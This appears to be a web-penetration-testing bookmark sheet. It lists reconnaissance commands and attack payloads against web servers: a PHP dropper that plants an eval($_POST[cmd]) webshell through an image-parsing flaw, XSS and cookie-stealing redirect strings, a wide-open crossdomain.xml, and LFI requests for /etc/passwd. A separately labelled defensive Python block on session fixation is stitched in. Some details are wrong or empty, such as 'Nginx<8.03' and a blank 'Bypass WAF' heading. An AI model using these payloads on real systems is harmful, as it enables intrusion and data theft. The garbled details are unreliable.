Web Security Bookmark

Information Gathering

OneForAll

$ python3 oneforall.py --target example.com run > output.txt

Nmap

Scan every TCP port on a host to find web services running on non-standard ports.

nmap -n -P0 -sS -sV -p1-65535 -oX report.xml [target IP]

The result will be saved in report.xml.

Check Web Server/Middleware Version Vulnerabilities

Common web servers and middleware: IIS, Apache, Nginx.

  • With IIS 7.0/IIS 7.5 or Nginx<8.03 using Fast-CGI, requesting /xx.jpg/xx.php causes xx.jpg to be executed as a PHP file.
    • Sample usage (Windows copy, binary image followed by the text payload): copy xx.jpg/b + yy.txt/a xy.jpg.
    • yy.txt:
<?php
	// when executed as PHP, writes shell.php containing a one-line eval shell
	fputs(fopen('shell.php','w'), '
	<?php
		eval($_POST[cmd])
	?>');
?>
    • Then request `/xy.jpg/xx.php`; shell.php with password `cmd` is generated.
  • Nginx<8.03 without Fast-CGI
    • /xx.jpg%00.php makes the .jpg file be parsed as PHP
  • Apache
    • Apache judges the extension from right to left, so test.php.x1.x2.x3 is handled as test.php
  • Windows
    • xx.jpg[space] or xx.jpg. is saved as xx.jpg (Windows strips trailing spaces and dots), which can bypass an extension blacklist

DNS zone transfer

An unrestricted DNS zone transfer (AXFR) leaks the following information:

  1. Network topology, i.e. the IP ranges of most servers
  2. The IP of the database server
  3. The IP of testing servers
  4. The address of the VPN server
  5. Other sensitive servers

Detection Techniques:

  • nslookup example:
$ nslookup
> server dns1.xxxxxx.com
> ls xxxxxx.com

# or
$ nslookup
> set type=ns
> npc.gov.cn
> server ns.xxxxxx.com   # select the name server
> set type=axfr          # zone transfer
> ls -d xxxxxx.com
  • nmap
$ nmap --script dns-zone-transfer --script-args dns-zone-transfer.domain=xxxxxx.com -p 53 -Pn dns1.xxxxxx.com
  • dig
$ dig xxxxxx.com ns
$ dig axfr @dns1.xxxxxx.com xxxxxx.com
  • dnsenum

Bypass WAF

Session Fixation

  1. Check whether the session ID changes after the user logs in successfully.
  2. If it does not, attackers can create a new session and hand its ID to arbitrary users (session fixation).
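The two checks above as a runnable illustration, added here and not part of the original notes: a toy session store (constructed for this example, not a real framework) with a login that keeps the pre-login session ID beside one that rotates it, and a check that reports whether the ID changed and whether the old, possibly planted ID still resolves to the logged-in user.

```python
import secrets


class SessionStore:
    """Toy server-side session store (constructed; not a real framework)."""

    def __init__(self):
        self.sessions = {}  # session ID -> {"user": name or None}

    def new_session(self):
        # ID handed to an anonymous visitor before login
        sid = secrets.token_urlsafe(32)
        self.sessions[sid] = {"user": None}
        return sid

    def login_keep_id(self, sid, user):
        # Check 1 fails: the pre-login ID is simply upgraded, so whoever already
        # holds that ID (e.g. an attacker who planted it) is now logged in as `user`.
        self.sessions[sid]["user"] = user
        return sid

    def login_rotate_id(self, sid, user):
        # Mitigation: discard the pre-login session and issue a fresh ID at the
        # privilege change, so a planted ID never becomes authenticated.
        self.sessions.pop(sid, None)
        new_sid = secrets.token_urlsafe(32)
        self.sessions[new_sid] = {"user": user}
        return new_sid

    def whoami(self, sid):
        entry = self.sessions.get(sid)
        return entry["user"] if entry else None


def check_session_rotation(rotate_on_login):
    """Run both checks from the note against one login strategy: did the ID
    change on login, and does the old ID still resolve to the logged-in user?"""
    store = SessionStore()
    pre_login = store.new_session()
    login = store.login_rotate_id if rotate_on_login else store.login_keep_id
    post_login = login(pre_login, "alice")
    return {
        "rotated": post_login != pre_login,
        "old_id_still_authenticated": store.whoami(pre_login) == "alice",
    }
```

`check_session_rotation(False)` reports the fixable behaviour, `check_session_rotation(True)` the mitigated one.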

Local Storage Problem

Check how setItem and getItem are used: data read back from localStorage and written into the page unescaped is a DOM XSS sink.

Sample PoC:

http://server/StoragePOC.html#<img src=x onerror=alert(1)>

XSS

JS

location.search:

www.victim.com/?javascript:alert(666)

location.hash/window.location.hash.indexOf('msg='):

#

Burp Plugin

  • Turbo Intruder: a Burp Suite extension for sending large numbers of HTTP requests and analyzing the results

More Plugin

OpenRedirect

http://www.victim.site/?#javascript:alert(document.cookie)
http://www.victim.site/?#www.malicious.site

Cross-site Flash

A fully permissive crossdomain.xml (any origin may read responses and send any header):

<?xml version="1.0"?>
<cross-domain-policy>
    <site-control permitted-cross-domain-policies="all" />
    <allow-access-from domain="*" />
    <allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>

HTML Injection

http://vulnerable.site/page.html?user=<img%20src='aaa'%20onerror=alert(1)>

Web console leakage

Common products: Tomcat, aria2, WebLogic, WebSphere, Oracle, JBoss. Typical console paths:

http://hostname:port/load/
http://x.x.x.x:8080/manage/

Apache+Tomcat: http://x.x.x.x:8080/manager/html and http://x.x.x.x/admin

WebLogic: http://localhost:7001/console

WebSphere: http://localhost:9060/ibm/console and https://localhost:9043/ibm/console/logon.jsp

Oracle web console: http://localhost:5500/em

MongoDB HTTP interface: database port + 1000

HP System Management: https://localhost:2381/cpqlogin.php?errno=100&severity=4

LFI

http://vulnerable_host/preview.php?file=../../../../etc/passwd
http://vulnerable_host/preview.php?file=../../../../etc/passwd%00
